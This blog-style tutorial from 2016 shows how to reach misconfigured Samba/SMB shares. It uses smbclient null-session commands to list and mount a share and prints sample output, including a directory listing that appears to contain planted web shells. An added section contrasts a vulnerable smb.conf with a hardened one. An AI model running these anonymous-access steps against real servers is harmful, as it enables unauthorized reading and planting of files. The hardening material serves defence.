By: Kl4us
August 1, 2016

How to Exploit a Poorly Configured SMB


What's an SMB?

SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.

SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that's incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.

Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

(Samba.org)

Exploiting Badly Configured SMBs

What you'll need:
  1. A machine that can run the smbclient command
  2. A vulnerable/poorly configured SMB machine (remote or local)
  3. SMB port: 445
  4. A computer network

Steps:

Check share names

To view the SMB share names, use the command:

```
smbclient -L 192.168.25.1 -N
```

(192.168.25.1 is the IP address of the SMB server in this example; -L lists the shares and -N suppresses the password prompt, i.e. it tries an anonymous/null session.)

You'll get something like this:

```
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        arquivos        Disk
        IPC$            IPC       IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Server               Comment
        ---------            -------
        SAMBA                Samba Server 4.3.9-Ubuntu

        Workgroup            Master
        ---------            -------
        COMPUTACAO           SAMBA
```

After doing that, you'll need to pick a share name, for example "arquivos" or "IPC$". I highly recommend picking one whose name does not contain "$": those are hidden/administrative shares (IPC$ is the inter-process communication share rather than a file share), and a plainly named share is much more likely to grant you permissions.

In this case, I'm going to pick "arquivos" as the share name.

Finally, connect to it:

```
smbclient //192.168.25.1/arquivos -N
```

And that's pretty much it. If the host is fully exposed (the share accepts the anonymous session and is writable), you can now list, download and upload files.

Example:

```
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Jul 19 09:12:48 2016
  ..                                  D        0  Fri May 22 09:25:21 2015
  html                                D        0  Fri Jul 15 03:48:38 2016
  codeigniter                         D        0  Fri Jul  3 17:00:48 2015
  serverconfig.php                    A   100402  Fri Jul 15 03:48:46 2016
  phpmyadmin                          D        0  Fri May 22 16:28:47 2015
  khy                                AR        0  Tue Jul 19 09:12:48 2016
  cgitelnet1                          D        0  Fri Jul 15 05:40:41 2016
  supp1.1                             D        0  Tue Jul  7 19:35:09 2015
  index.html                          N      142  Tue May 10 16:30:59 2016
  teste.php                           A       21  Fri May 22 11:56:35 2015
  enxjdf.exe                          N   571074  Mon Apr 14 16:06:33 2008
  cherno.php                          N   210752  Fri Jul 15 05:13:46 2016

                151380148 blocks of size 1024. 132224492 blocks available
smb: \>
```
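The listing above is what anonymous access to a writable Samba share looks like from the client side. As an added example that is not part of the original post, here is the shape of an smb.conf that produces exactly that exposure, followed by a hardened version of the same share; the workgroup and share name follow the post, while the path, subnet and group names are placeholders.

```ini
; ---- smb.conf fragment: the misconfiguration the post demonstrates ----
; Unknown users are mapped to the guest account, and the share is both
; readable and writable by guests, so "smbclient -N" (no password) gets
; a session and can ls, get and put.  Path/subnet/groups are placeholders.
[global]
   workgroup = COMPUTACAO
   map to guest = Bad User        ; any unknown username becomes the guest user
   server min protocol = NT1      ; still accepts SMB1 clients

[arquivos]
   path = /srv/samba/arquivos     ; placeholder path
   guest ok = yes                 ; anonymous sessions may connect to this share
   writable = yes                 ; ...and may upload or modify files
   browseable = yes               ; ...and it shows up in "smbclient -L"

; ---- smb.conf fragment: hardened equivalent ----
; Anonymous sessions are refused outright, so both the share listing
; (-L -N) and the share connection (-N) in the post fail.  Access is
; then limited to named groups and to the local subnet.
[global]
   workgroup = COMPUTACAO
   map to guest = Never           ; reject unknown users instead of mapping them
   restrict anonymous = 2         ; no anonymous connections at all (incl. IPC$)
   server min protocol = SMB2     ; drop SMB1
   hosts allow = 192.168.25.0/24 127.0.0.1   ; placeholder subnet
   hosts deny = ALL
   log level = 1 auth:3           ; record authentication attempts for review

[arquivos]
   path = /srv/samba/arquivos     ; placeholder path
   guest ok = no
   valid users = @arquivos        ; placeholder group: only its members may connect
   read only = yes
   write list = @arquivos-editors ; placeholder group: the only ones who may write
   browseable = no                ; not listed, but reachable by name for valid users
```

Run `testparm -s` on the edited file before reloading smbd; it rejects unknown parameters and prints the effective values, so a setting such as `map to guest` that was silently left at its default becomes visible.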

You can view all the smbclient commands by typing "?":

```
smb: \> ?
?              allinfo        altname        archive        backup
blocksize      cancel         case_sensitive cd             chmod
chown          close          del            dir            du
echo           exit           get            getfacl        geteas
hardlink       help           history        iosize         lcd
link           lock           lowercase      ls             l
mask           md             mget           mkdir          more
mput           newer          notify         open           posix
posix_encrypt  posix_open     posix_mkdir    posix_rmdir    posix_unlink
print          prompt         put            pwd            q
queue          quit           readlink       rd             recurse
reget          rename         reput          rm             rmdir
showacls       setea          setmode        scopy          stat
symlink        tar            tarmode        timeout        translate
unlock         volume         vuid           wdel           logon
listconnect    showconnect    tcon           tdis           tid
logoff         ..             !
```

I made a Python script that does all the hard work; if you want, you can get it here.
